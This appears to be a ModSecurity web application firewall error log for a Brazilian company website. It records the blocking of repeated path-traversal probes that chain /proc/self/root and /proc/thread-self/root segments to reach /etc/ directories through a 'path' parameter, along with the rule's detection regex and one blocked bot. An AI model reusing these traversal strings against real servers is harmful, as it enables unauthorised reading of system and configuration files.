[Mon Mar 16 18:39:16.051617 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:58542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4hLysWC90G-1nBrBkxgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:39:19.367717 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:42244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4h1ajLEzk2WiQ-10yMAAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:39:20.621613 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:41198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4iKQpVkWug9HeOt9UigAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:39:21.692724 2026] [:error] [pid 10651:tid 140411658000128] [client 74.7.241.46:45472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4ibysWC90G-1nBrBkywAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:39:24.344686 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:45476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4jEr9dMAiw-8KANNomwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:39:31.151301 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:45482] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4k46lpbStxTqkSkuIRwAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:39:33.137262 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.243.203:46600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4laQpVkWug9HeOt9UlQAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:39:33.544157 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:55374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4ldSswJuvopo3lOiA5wAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:39:41.722602 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:55388] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4nf9ocpUE4ed4uDwTsQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:39:43.224258 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:34072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4n1ajLEzk2WiQ-10yMQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:39:48.071724 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:34078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4pFajLEzk2WiQ-10yNwAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:39:54.199715 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:46100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4qo6lpbStxTqkSkuIXAAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:40:03.121702 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.244.31:55666] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh4s_9ocpUE4ed4uDwTxwAAAg8"]
[Mon Mar 16 18:40:06.812485 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:45558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4taTCbgAP5jq5TehLYgAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:40:08.173210 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:54594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh4uP9ocpUE4ed4uDwTzAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:40:41.971097 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:54610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh42f9ocpUE4ed4uDwUDAAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:41:01.402891 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.241.46:45404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh47Ur9dMAiw-8KANNo2QAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:41:06.318533 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:42058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh48v9ocpUE4ed4uDwUIgAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:41:06.418242 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:50878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh48v9ocpUE4ed4uDwUIwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:41:07.602208 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:42060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh48_9ocpUE4ed4uDwUJAAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:41:22.363625 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:42934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5ArysWC90G-1nBrBlOgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:41:41.807771 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:39842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh5Ff9ocpUE4ed4uDwURAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
